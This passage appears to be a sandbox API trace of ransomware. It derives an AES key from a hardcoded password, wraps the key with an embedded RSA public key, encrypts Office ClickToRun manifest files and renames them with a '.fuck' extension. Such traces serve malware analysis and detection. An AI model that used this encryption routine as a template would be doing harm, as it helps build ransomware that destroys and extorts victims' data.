phHash=0x2b9dcd4) returned 1 [0236.346] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.346] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.346] CryptDeriveKey (in: hProv=0x27fef68, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebc60) returned 1 [0236.346] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.346] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.346] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ff980) returned 1 [0236.348] CryptImportPublicKeyInfo (in: hCryptProv=0x27ff980, dwCertEncodingType=0x1, pInfo=0x2808f20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2808f50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2808f58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x394d28) returned 1 [0236.348] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.348] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ffa90*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27ffa90*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.348] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27ffa90, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.348] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.348] CryptEncrypt (in: hKey=0x27ebc60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.348] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.348] CloseHandle (hObject=0xffffffff) returned 1 [0236.348] CloseHandle (hObject=0xffffffff) returned 1 [0236.348] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0236.348] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0236.349] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml.gsg")) returned 0 [0236.349] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml.fuck")) returned 0 [0236.349] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0236.349] CryptDestroyKey (hKey=0x27ebc60) returned 1 [0236.349] CryptReleaseContext (hProv=0x27fef68, dwFlags=0x0) returned 1 [0236.349] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.349] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.349] GetLastError () returned 0x5 [0236.350] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml")) returned 0x20 [0236.350] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0236.350] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.351] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.351] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.351] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28005b8) returned 1 [0236.356] CryptCreateHash (in: hProv=0x28005b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.356] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.356] CryptHashData (hHash=0x394b28, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.356] CryptDeriveKey (in: hProv=0x28005b8, Algid=0x6610, hBaseData=0x394b28, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebc60) returned 1 [0236.356] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.356] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.356] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ffc28) returned 1 [0236.357] CryptImportPublicKeyInfo (in: hCryptProv=0x27ffc28, dwCertEncodingType=0x1, pInfo=0x28094d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2809500*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2809508*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb8a0) returned 1 [0236.357] CryptEncrypt (in: hKey=0x27eb8a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.357] CryptEncrypt (in: hKey=0x27eb8a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fffe0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27fffe0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.358] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27fffe0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.358] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279c798, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279c798, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.358] CryptEncrypt (in: hKey=0x27ebc60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279c798*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279c798*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.358] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279c798, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.358] CloseHandle (hObject=0xffffffff) returned 1 [0236.358] CloseHandle (hObject=0xffffffff) returned 1 [0236.358] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0236.358] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0236.358] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml.gsg")) returned 0 [0236.359] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml.fuck")) returned 0 [0236.359] CryptDestroyHash (hHash=0x394b28) returned 1 [0236.359] CryptDestroyKey (hKey=0x27ebc60) returned 1 [0236.359] CryptReleaseContext (hProv=0x28005b8, dwFlags=0x0) returned 1 [0236.359] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.359] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.359] GetLastError () returned 0x5 [0236.359] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml")) returned 0x20 [0236.360] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0236.360] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.360] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.360] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.360] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28005b8) returned 1 [0236.365] CryptCreateHash (in: hProv=0x28005b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.365] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.365] CryptHashData (hHash=0x27ebc60, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.365] CryptDeriveKey (in: hProv=0x28005b8, Algid=0x6610, hBaseData=0x27ebc60, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27175e8) returned 1 [0236.365] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.365] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.365] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ffed0) returned 1 [0236.366] CryptImportPublicKeyInfo (in: hCryptProv=0x27ffed0, dwCertEncodingType=0x1, pInfo=0x280a2a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x280a2d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x280a2d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2716fa8) returned 1 [0236.366] CryptEncrypt (in: hKey=0x2716fa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.366] CryptEncrypt (in: hKey=0x2716fa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ffcb0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27ffcb0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.366] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27ffcb0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.366] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279c798, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279c798, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.366] CryptEncrypt (in: hKey=0x27175e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279c798*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279c798*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.366] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279c798, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.366] CloseHandle (hObject=0xffffffff) returned 1 [0236.366] CloseHandle (hObject=0xffffffff) returned 1 [0236.367] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0236.367] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0236.367] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml.gsg")) returned 0 [0236.367] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml.fuck")) returned 0 [0236.368] CryptDestroyHash (hHash=0x27ebc60) returned 1 [0236.368] CryptDestroyKey (hKey=0x27175e8) returned 1 [0236.368] CryptReleaseContext (hProv=0x28005b8, dwFlags=0x0) returned 1 [0236.368] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.368] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.368] GetLastError () returned 0x5 [0236.368] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml")) returned 0x20 [0236.369] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0236.369] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.369] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.369] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.370] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27ffe48) returned 1 [0236.374] CryptCreateHash (in: hProv=0x27ffe48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.374] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.374] CryptHashData (hHash=0x27175e8, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.374] CryptDeriveKey (in: hProv=0x27ffe48, Algid=0x6610, hBaseData=0x27175e8, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x394b28) returned 1 [0236.374] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.374] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.374] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28005b8) returned 1 [0236.376] CryptImportPublicKeyInfo (in: hCryptProv=0x28005b8, dwCertEncodingType=0x1, pInfo=0x280a1d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x280a200*, 